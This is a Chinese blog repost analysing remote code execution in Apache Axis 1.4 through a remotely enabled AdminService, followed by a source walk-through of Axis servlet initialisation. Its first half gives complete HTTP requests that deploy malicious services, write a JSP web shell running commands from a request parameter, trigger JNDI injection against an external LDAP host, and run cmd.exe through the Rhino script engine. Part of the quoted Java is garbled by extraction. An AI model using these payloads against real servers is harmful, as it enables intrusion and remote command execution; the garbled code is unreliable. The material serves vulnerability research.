Java安全之Axis漏洞分析

最新推荐文章于 2024-05-19 17:47:16 发布
最新推荐文章于 2024-05-19 17:47:16 发布
阅读量2.9k 收藏 2
点赞数
文章标签: stm32 物联网 pytorch
原文链接:https://www.cnblogs.com/nice0e3/p/15605781.html
版权

0x01 漏洞复现#
漏洞版本:axis=<1.4

Axis1.4

freemarker

下载Axis包1.4版本将Axis放到tomcat的webapp目录中。freemarker.jar放到Axis的 lib目录下。运行tomcat即可。

WEB-INF/web.xml 中将该配置取消注释

AdminServlet /servlet/AdminServlet 原创复现需要将/WEB-INF下面的server-config.wsdd文件中的内容进行编辑一下 http://xml.apache.org/axis/wsdd/ enableRemoteAdmin的值改成true运行远程调用。

server-config.wsdd文件会在远程机器访问/servlet/AdminServlet路由时候进行创建。

接下来对该接口进行发送payload测试

<?xml version="1.0" encoding="utf-8"?>

<soapenv:Envelope xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance”
xmlns:api=“http://127.0.0.1/Integrics/Enswitch/API”
xmlns:xsd=“http://www.w3.org/2001/XMLSchema”
xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/”>
soapenv:Body
<ns1:deployment
xmlns=“http://xml.apache.org/axis/wsdd/”
xmlns:java=“http://xml.apache.org/axis/wsdd/providers/java”
xmlns:ns1=“http://xml.apache.org/axis/wsdd/”>
<ns1:service name=“RandomService” provider=“java:RPC”>



<ns1:parameter name=“className” value=“java.util.Random”/>
<ns1:parameter name=“allowedMethods” value="*"/>
</ns1:service>




</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>

爆了一个ns1:Client.NoSOAPAction错误。

看了一下AdminServlet的代码,发现dopost方法里面调用的getSoapAction这个判断逻辑貌似有点问题

上面req.getHeader(“SOAPAction”);获取header里面SOAPAction的值,如果为空则取Content-Type里面的action。都为空则直接返回,来到下面这段逻辑。

if (soapAction == null) {
  AxisFault af = new AxisFault("Client.NoSOAPAction", Messages.getMessage("noHeader00", "SOAPAction"), null, null);
  exceptionLog.error(Messages.getMessage("genFault00"), (Throwable)af);
  throw af;
}

这里只需要header加入SOAPAction参数,填充任意值,让服务端获取到不为空,能解决了这个问题。

使用上面payload,创建好恶意的service后,下面来调用一下恶意的service。

/axis/services/RandomService
payload:

<?xml version="1.0" encoding="utf-8"?> 
    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
    <api:main
    soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <api:in0><![CDATA[

<%@page import=“java.util.,java.io.”%><% if (request.getParameter(“c”) != null) { Process p = Runtime.getRuntime().exec(request.getParameter(“c”)); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
</api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>

文件写入成功

重新打开server-config.wsdd文件发现内容已经发生了变化

payload整理#
org.apache.axis.handlers.LogHandler#
POST请求:

POST /axis/services/AdminService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: “”
Content-Length: 777

<soap:Envelope xmlns:soap=“http://schemas.xmlsoap.org/soap/envelope/” >
soap:Body












</soap:Body>
</soap:Envelope>
GET请求:

GET /axis/services/AdminService?method=!–%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22…%2Fwebapps%2FROOT%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
调用service:

POST /axis/services/randomBBB HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: “”
Content-Length: 700

<soapenv:Envelope xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=“http://www.w3.org/2001/XMLSchema” xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:util=“http://util.java”>
soapenv:Header/
soapenv:Body
<util:ints soapenv:encodingStyle=“http://schemas.xmlsoap.org/soap/encoding/”>
<![CDATA[ <% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); %> ]]>
?
</util:ints>
</soapenv:Body>
</soapenv:Envelope>
该方式写文件需要解析,遇到Springboot就凉凉。

org.apache.axis.client.ServiceFactory#
POST请求:

POST /axis/services/AdminService HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 750

<?xml version="1.0" encoding="utf-8"?>

<soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:api=“http://127.0.0.1/Integrics/Enswitch/API” xmlns:xsd=“http://www.w3.org/2001/XMLSchema”>
soapenv:Body
<ns1:deployment xmlns:ns1=“http://xml.apache.org/axis/wsdd/” xmlns=“http://xml.apache.org/axis/wsdd/” xmlns:java=“http://xml.apache.org/axis/wsdd/providers/java”>
<ns1:service name=“ServiceFactoryService” provider=“java:RPC”>
<ns1:parameter name=“className” value=“org.apache.axis.client.ServiceFactory”/>
<ns1:parameter name=“allowedMethods” value="*"/>
</ns1:service>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>
GET请求:

GET /axis/services/AdminService?method=!–%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22ServiceFactoryService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22org.apache.axis.client.ServiceFactory%22%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%2F%3E%3C%2Fservice%3E%3C%2Fdeployment HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
调用service:

POST /axis/services/ServiceFactoryService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: “”
Content-Length: 891

<soapenv:Envelope xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=“http://www.w3.org/2001/XMLSchema” xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:cli=“http://client.axis.apache.org”>
soapenv:Header/
soapenv:Body
<cli:getService soapenv:encodingStyle=“http://schemas.xmlsoap.org/soap/encoding/”>



jndiName
ldap://xxx.xx.xx.xxx:8888/Exploit


</cli:getService>
</soapenv:Body>
</soapenv:Envelope>
这个点需要利用JNDI注入

com.sun.script.javascript.RhinoScriptEngine#
POST请求:

POST /axis/services/AdminService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: “”
Content-Length: 905

<soap:Envelope xmlns:soap=“http://schemas.xmlsoap.org/soap/envelope/” >
soap:Body








</soap:Body>
</soap:Envelope>
GET请求:

GET /axis/services/AdminService?method=!–%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
调用service:

POST /axis/services/RhinoScriptEngineService HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: “”
Content-Length: 866

<?xml version='1.0' encoding='UTF-8'?> <![CDATA[function test(){ var cmd1 = 'c'; cmd1 += 'm'; cmd1 += 'd'; cmd1 += '.'; cmd1 += 'e'; cmd1 += 'x'; cmd1 += 'e'; var cmd2 = '/'; cmd2 += 'c'; var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'whoami'); var process = pb.start(); var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next(); return ret;} test();]]>

</soapenv:Body></soapenv:Envelope>
该方式有JDK版本要求 JDK版本必须要为7或7以下版本。JDK7版本后ScriptEngine被废除了,使用了NashornScriptEngine进行代替,NashornScriptEngine类不能直接被利用

解析流程分析#
Init#

AxisServlet
Apache-Axis Servlet

org.apache.axis.transport.http.AxisServlet




AxisServlet
/services/*

看到org.apache.axis.transport.http.AxisServlet

public void init() throws ServletException {
super.init();
ServletContext context = this.getServletConfig().getServletContext();
isDebug = log.isDebugEnabled();
if (isDebug) {
log.debug(“In servlet init”);
}

    this.transportName = this.getOption(context, "transport.name", "http");
    if (JavaUtils.isTrueExplicitly(this.getOption(context, "use-servlet-security", (String)null))) {
        this.securityProvider = new ServletSecurityProvider();
    }

    this.enableList = JavaUtils.isTrueExplicitly(this.getOption(context, "axis.enableListQuery", (String)null));
    this.jwsClassDir = this.getOption(context, "axis.jws.servletClassDir", (String)null);
    this.disableServicesList = JavaUtils.isTrue(this.getOption(context, "axis.disableServiceList", "false"));
    this.servicesPath = this.getOption(context, "axis.servicesPath", "/services/");
    if (this.jwsClassDir != null) {
        if (this.getHomeDir() != null) {
            this.jwsClassDir = this.getHomeDir() + this.jwsClassDir;
        }
    } else {
        this.jwsClassDir = this.getDefaultJWSClassDir();
    }

//初始化查询Handler,即wsdl对应的handler,用于wsdl文件生成
this.initQueryStringHandlers();

    try {
        ServiceAdmin.setEngine(this.getEngine(), context.getServerInfo());
    } catch (AxisFault var3) {
        exceptionLog.info("Exception setting AxisEngine on ServiceAdmin " + var3);
    }

}

把所有以jws结尾或者services路径的的URL均由AxisServlet进行处理

super.init();

org.apache.axis.transport.http.init

public void init() throws ServletException {
ServletContext context = this.getServletConfig().getServletContext();
this.webInfPath = context.getRealPath("/WEB-INF");
this.homeDir = context.getRealPath("/");
isDebug = log.isDebugEnabled();
if (log.isDebugEnabled()) {
log.debug(“In AxisServletBase init”);
}

    this.isDevelopment = JavaUtils.isTrueExplicitly(this.getOption(context, "axis.development.system", (String)null));
}

org.apache.axis.transport.http.getOption

protected String getOption(ServletContext context, String param, String dephault) {
String value = AxisProperties.getProperty(param);
if (value == null) {
value = this.getInitParameter(param);
}

    if (value == null) {
        value = context.getInitParameter(param);
    }

    try {
        AxisServer engine = getEngine(this);
        if (value == null && engine != null) {
            value = (String)engine.getOption(param);
        }
    } catch (AxisFault var6) {
    }

    return value != null ? value : dephault;
}

org.apache.axis.transport.http.getEngine

public static AxisServer getEngine(HttpServlet servlet) throws AxisFault {
AxisServer engine = null;
if (isDebug) {
log.debug(“Enter: getEngine()”);
}

    ServletContext context = servlet.getServletContext();
    synchronized(context) {
        engine = retrieveEngine(servlet);
        if (engine == null) {
            Map environment = getEngineEnvironment(servlet);
            engine = AxisServer.getServer(environment);
            engine.setName(servlet.getServletName());
            storeEngine(servlet, engine);
        }
    }

    if (isDebug) {
        log.debug("Exit: getEngine()");
    }

    return engine;
}

org.apache.axis.transport.http.getEngineEnvironment

从当前上下文中获取AxisServer Engine,如果返回为null,则进行初始化并存储至上下文中

protected static Map getEngineEnvironment(HttpServlet servlet) {
Map environment = new HashMap();
String attdir = servlet.getInitParameter(“axis.attachments.Directory”);
if (attdir != null) {
environment.put(“axis.attachments.Directory”, attdir);
}

    ServletContext context = servlet.getServletContext();
    environment.put("servletContext", context);
    String webInfPath = context.getRealPath("/WEB-INF");
    if (webInfPath != null) {
        environment.put("servlet.realpath", webInfPath + File.separator + "attachments");
    }

    EngineConfiguration config = EngineConfigurationFactoryFinder.newFactory(servlet).getServerEngineConfig();
    if (config != null) {
        environment.put("engineConfig", config);
    }

    return environment;
}

这里返回的是一个org.apache.axis.configuration.EngineConfigurationFactoryServlet工厂实例

调用getServerEngineConfig来到org.apache.axis.configuration.getServerEngineConfig,

EngineConfigurationFactoryFinder.newFactory(servlet)返回org.apache.axis.configuration.EngineConfigurationFactoryServlet工厂实例,并通过private static EngineConfiguration getServerEngineConfig(ServletConfig cfg)新建EngineConfiguration实现类:FileProvider对象(即server-config.wsdd的文件操作类)

代码流程回到getEngineEnvironment

protected static Map getEngineEnvironment(HttpServlet servlet) {
Map environment = new HashMap();
String attdir = servlet.getInitParameter(“axis.attachments.Directory”);
if (attdir != null) {
environment.put(“axis.attachments.Directory”, attdir);
}

ServletContext context = servlet.getServletContext();
environment.put("servletContext", context);
String webInfPath = context.getRealPath("/WEB-INF");
if (webInfPath != null) {
    environment.put("servlet.realpath", webInfPath + File.separator + "attachments");
}

EngineConfiguration config = EngineConfigurationFactoryFinder.newFactory(servlet).getServerEngineConfig();
if (config != null) {
    environment.put("engineConfig", config);
}

return environment;

}
environment.put(“engineConfig”, config);

把刚刚读取server-config.wsdd的对象,存储到map中进行返回。

逻辑走到org.apache.axis.transport.http.getEngine

public static AxisServer getEngine(HttpServlet servlet) throws AxisFault {
AxisServer engine = null;
if (isDebug) {
log.debug(“Enter: getEngine()”);
}

ServletContext context = servlet.getServletContext();
synchronized(context) {
    engine = retrieveEngine(servlet);
    if (engine == null) {
        Map environment = getEngineEnvironment(servlet);
        engine = AxisServer.getServer(environment);
        engine.setName(servlet.getServletName());
        storeEngine(servlet, engine);
    }
}

org.apache.axis.server.AxisServer

public static AxisServer AxisServer(Map environment) throws AxisFault {
if (factory == null) {
String factoryClassName = AxisProperties.getProperty(“axis.ServerFactory”);
if (factoryClassName != null) {
try {
Class factoryClass = ClassUtils.forName(factoryClassName);
if ((class o r g org orgapache a x i s axis axisserver A x i s S e r v e r F a c t o r y = = n u l l ? ( c l a s s AxisServerFactory == null ? (class AxisServerFactory==null?(classorg a p a c h e apache apacheaxis s e r v e r server serverAxisServerFactory = class ( " o r g . a p a c h e . a x i s . s e r v e r . A x i s S e r v e r F a c t o r y " ) ) : c l a s s ("org.apache.axis.server.AxisServerFactory")) : class ("org.apache.axis.server.AxisServerFactory")):classorg a p a c h e apache apacheaxis s e r v e r server serverAxisServerFactory).isAssignableFrom(factoryClass)) {
factory = (AxisServerFactory)factoryClass.newInstance();
}
} catch (Exception var3) {
log.error(Messages.getMessage(“exception00”), var3);
}
}

        if (factory == null) {
            factory = new DefaultAxisServerFactory();
        }
    }

    return factory.getServer(environment);
}

加载到重载getServer方法

public AxisServer getServer(Map environment) throws AxisFault {
log.debug(“Enter: DefaultAxisServerFactory::getServer”);
AxisServer ret = createServer(environment);
if (ret != null) {
if (environment != null) {
ret.setOptionDefault(“attachments.Directory”, (String)environment.get(“axis.attachments.Directory”));
ret.setOptionDefault(“attachments.Directory”, (String)environment.get(“servlet.realpath”));
}

        String attachmentsdir = (String)ret.getOption("attachments.Directory");
        if (attachmentsdir != null) {
            File attdirFile = new File(attachmentsdir);
            if (!attdirFile.isDirectory()) {
                attdirFile.mkdirs();
            }
        }
    }

    log.debug("Exit: DefaultAxisServerFactory::getServer");
    return ret;
}

private static AxisServer createServer(Map environment) {
EngineConfiguration config = getEngineConfiguration(environment);
return config == null ? new AxisServer() : new AxisServer(config);
}
public AxisServer(EngineConfiguration config) {
super(config);
this.running = true;
this.setShouldSaveConfig(true);
}
org.apache.axis.AxisEngine

public AxisEngine(EngineConfiguration config) {
this.config = config;
this.init();
}
org.apache.axis.AxisEngine

public void init() {
if (log.isDebugEnabled()) {
log.debug(“Enter: AxisEngine::init”);
}

try {
    this.config.configureEngine(this);
} catch (Exception var2) {
    throw new InternalException(var2);
}

org.apache.axis.configuration.FileProvider

public void configureEngine(AxisEngine engine) throws ConfigurationException {
try {
if (this.getInputStream() == null) {
try {
this.setInputStream(new FileInputStream(this.configFile));
} catch (Exception var3) {
if (this.searchClasspath) {
this.setInputStream(ClassUtils.getResourceAsStream(engine.getClass(), this.filename, true));
}
}
}

        if (this.getInputStream() == null) {
            throw new ConfigurationException(Messages.getMessage("noConfigFile"));
        } else {
            WSDDDocument doc = new WSDDDocument(XMLUtils.newDocument(this.getInputStream()));
            //部署或者取消部署,这个得看文档配置
            this.deployment = doc.getDeployment();
            //定义所有数据配置此AxisEngine
            this.deployment.configureEngine(engine);
            //刷新内容
            engine.refreshGlobalOptions();
            this.setInputStream((InputStream)null);
        }
    } catch (Exception var4) {
        throw new ConfigurationException(var4);
    }
}

以上这整体解析流程为configureEngine解析server-config.wsdd服务配置。将配置文件中的各种属性handler、globalConfiguration、service、transport缓存至WSDDDeployment类中。刷新global配置选项即将server-config.wsdd配置文件中globalConfiguration节点中的parameter属性集合由AxisEngine持有。

以上就已经完成了init的

doGet#
看到doGet

public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
if (isDebug) {
log.debug(“Enter: doGet()”);
}

FilterPrintWriter writer = new FilterPrintWriter(response);

try {
    AxisEngine engine = this.getEngine();
    ServletContext servletContext = this.getServletConfig().getServletContext();
    String pathInfo = request.getPathInfo();
    String realpath = servletContext.getRealPath(request.getServletPath());
    if (realpath == null) {
        realpath = request.getServletPath();
    }

    boolean isJWSPage = request.getRequestURI().endsWith(".jws");
    if (isJWSPage) {
        pathInfo = request.getServletPath();
    }

    if (this.processQuery(request, response, writer)) {
        return;
    }
    亚马逊测评 www.yisuping.cn
福伴
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行(RCE)POC
06-06
xml 执行java源码 Axis <=1.4 远程命令执行(RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地环境可以不管) 本人部署在tomcat8上 利用 第一步: 通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务。这里我们要写入的文件名是../webapps/ROOT/shell.jsp,服务模块的工作路径是bin目录,这里利用相对路径写入ROOT目录,也就是tomcat默认根目录。 POST /axis/services/AdminService HTTP/1.1 Host: localhost:8080 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*
(CVE-2019-0227)Axis<=1.4 远程命令执行漏洞
m0_59598029的博客
01-24 1471
[图片](https://img-一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。
使用axis调用WebService,Java WebService调用工具类,2024年最新看完必懂
2401_84181340的博客
04-18 847
/ log.info(“调用 WebService 发送参数==>” + MapperUtils.mapToJson(params));// log.info(“调用 WebService 发送参数==>” + MapperUtils.mapToJson(params));// log.info(“调用 WebService 发送参数==>” + MapperUtils.mapToJson(params));* @param params 参数。* @param params 参数。
Axis搭建加漏洞RCE(含CVE-2019-0227)
GalaxySpaceX的博客
05-15 2091
Axis漏洞RCE,包含CVE-2019-0227
Apache Axis2 后台文件上传getshell 漏洞复现
Adminxe的博客
01-06 1978
0x00 前言 Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本。 事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。 Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXISAXIS本质..
axis2组件漏洞问题
08-01
推荐版本1.7.5
JAVA上百实例源码以及开源项目
01-03
 Java局域网通信——飞鸽传书源代码,大家都知道VB版、VC版还有Delphi版的飞鸽传书软件,但是Java版的确实不多,因此这个Java文件传输实例不可错过,Java网络编程技能的提升很有帮助。 Java聊天程序,包括服务端和...
java开源包1
06-28
JCarder 是一个用来查找多线程应用程序中一些潜在的死锁,通过对 Java 字节码的动态分析来完成死锁分析Java的Flash解析、生成器 jActionScript jActionScript 是一个使用了 JavaSWF2 的 Flash 解析器和生成器。...
java开源包11
06-28
JCarder 是一个用来查找多线程应用程序中一些潜在的死锁,通过对 Java 字节码的动态分析来完成死锁分析Java的Flash解析、生成器 jActionScript jActionScript 是一个使用了 JavaSWF2 的 Flash 解析器和生成器。...
axis2弱密码漏洞复现
信安是不可或缺的一部分!
12-30 4286
介绍 Axis2 Web 管理模块是一个下一代 Apache AxisAxis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。 环境介绍 主机
如何对使用了Axis组件的Java项目进行漏洞利用
lynnez_dd的博客
03-07 1150
近期发现一个高级的漏洞利用姿势——对使用了axis组件的Java项目进行远程命令执行。 IDEA+JavaWeb项目(servlet)+axis-bin-1_4.tar.gz+freemarker-2.3.8.jar+阿里云服务器 一、在本地使用IDEA搭建一个简单的JavaWeb项目 1、GitHub下载一个简单的JavaWeb项目CustomerManagement 2、在阿里云上开启一个Tomcat8的docker,将项目文件传输至Tomcat容器中 将项目的CustomerManageme
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现
qq_43697234的博客
07-21 8872
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现 漏洞产生原因: Axis 1.4 adminservice开启远程访问,此时攻击者可通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务 影响范围:Axis <=1.4 且enableRemoteAdmin设置为True 环境搭建:tomcat8.5+apache Axis 1.4 将apache Axis 1.4 下的webapps/axis包放到tom
Axis1.4漏洞,Caused by: org.apache.axis.AxisFault: java.util.ConcurrentModificationException
zhongyi11111111的博客
07-21 2121
Axis1.4漏洞,Caused by: org.apache.axis.AxisFault: java.util.ConcurrentModificationException问题原因解决方案 问题 Caused by: org.apache.axis.AxisFault: java.util.ConcurrentModificationException at org.apache.axis.message.SOAPFaultBuilder.createFault(SOAPFaultBuilder.ja
STM32】检测SD卡是否插入
AC0
05-18 427
使用中断的方式检测SD卡是否插入。插入时初始化,拔出时取消初始化
STM32】标准库实现中断点灯/串口通信
最新发布
weixin_72935906的博客
05-19 739
在实际硬件操控时,会遇到很多情况。比如本次探究中,就发现下载代码后并没有按照预想的那样实现功能,可以试试1.按下Stm32的RESET复位键。2.如果是无法收发串口信息,可以先按复位观察,如果没反应就更换串口助手软件。3.检查代码中的波特率。4.更换硬件。
stm32常用编写C语言基础知识,条件编译,结构体等
weixin_43794311的博客
05-16 316
常用单片编程知识
STM32使用旋转编码开关
qq_26043945的博客
05-18 340
总的来说,旋转编码开关是一种功能强大、应用广泛的电子元器件,在工业自动化、机器人技术、伺服控制系统、电梯、电机控制、音视频设备、游戏控制器以及其他需要精确位置控制和速度反馈的各种机械设备中都有重要的应用。当A或者B引脚触发后,然后通过检测另外一个引脚的状态来确定波动旋转编码开关的方向,具体操作如下所示。首先需要在CubeMX中选择适当的引脚连接旋转编码开关的输出引脚,并将其设置为EXTI模式,然后对引脚启用中断功能。当改变状态时,如果 A:下降沿,B:为高电平,则顺时针转动旋钮。
javaaxis服务
03-24
可以使用 Apache Axis 来创建 Web 服务。Axis 是一个基于 SOAP 的 Web 服务框架,它支持多种编程语言,包括 Java。您可以使用 Axis 创建和部署 Web 服务,以便客户端可以通过 SOAP 协议与您的服务进行通信。如果您需要更详细的信息,可以查看 Apache Axis 的官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值